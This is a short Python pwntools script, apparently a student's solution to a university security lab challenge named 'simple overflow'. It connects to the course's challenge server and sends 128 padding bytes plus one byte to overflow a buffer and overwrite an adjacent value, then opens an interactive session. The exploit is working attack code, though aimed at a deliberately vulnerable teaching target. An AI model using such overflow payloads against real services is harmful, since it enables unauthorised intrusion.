Files
ssof_labs/pa/lab6/chall_simple_overflow.py
2025-12-20 15:44:03 +00:00

11 lines
181 B
Python

from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25151
conn = remote(HOST, PORT)
conn.recvuntil("0.\n")
conn.send(b"\x55"*128 + b"\x01\n")
conn.interactive()